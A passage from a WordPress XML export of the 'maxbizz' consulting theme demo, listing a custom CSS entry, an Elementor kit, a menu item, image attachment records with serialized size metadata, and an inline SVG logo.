1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/maxbizz/</link>
		<pubDate>Fri, 02 Oct 2020 03:26:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/maxbizz/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1210</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 03:26:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 03:26:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?elementor_library=default-kit-2</link>
		<pubDate>Thu, 03 Sep 2020 08:41:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1290</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:41:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:41:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Pages</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/pages/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/pages/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1292</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pages]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>2</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/bg2-home2/</link>
		<pubDate>Wed, 21 Oct 2020 03:49:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1386</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 03:49:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 03:49:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg2-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:567;s:4:"file";s:21:"2020/10/bg2-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg2-home2-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-home2-1024x302.jpg";s:5:"width";i:1024;s:6:"height";i:302;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-home2-768x227.jpg";s:5:"width";i:768;s:6:"height";i:227;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-home2-1536x454.jpg";s:5:"width";i:1536;s:6:"height";i:454;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x567.jpg";s:5:"width";i:600;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/image1-home2/</link>
		<pubDate>Wed, 21 Oct 2020 07:37:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1401</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 07:37:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 07:37:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/image1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:492;s:4:"file";s:24:"2020/10/image1-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"image1-home2-300x77.jpg";s:5:"width";i:300;s:6:"height";i:77;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"image1-home2-1024x262.jpg";s:5:"width";i:1024;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"image1-home2-768x197.jpg";s:5:"width";i:768;s:6:"height";i:197;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"image1-home2-1536x394.jpg";s:5:"width";i:1536;s:6:"height";i:394;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home2-600x492.jpg";s:5:"width";i:600;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"image1-home2-1200x492.jpg";s:5:"width";i:1200;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"image1-home2-1200x492.jpg";s:5:"width";i:1200;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/bg3-home2/</link>
		<pubDate>Wed, 21 Oct 2020 08:04:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1406</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 08:04:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 08:04:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg3-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:21:"2020/10/bg3-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg3-home2-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-home2-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg3-home2-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-home2-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_footer_builders/footer-1/02_white/</link>
		<pubDate>Wed, 21 Oct 2020 09:11:29 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1416</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 09:11:29]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 09:11:29]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/02_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#A4C1FF"></stop>
	<stop offset="1" style="stop-color:#4B83FC"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>signature-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/signature-home2/</link>
		<pubDate>Wed, 21 Oct 2020 10:52:34 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/signature-home2.png</guid>
		<description></description>
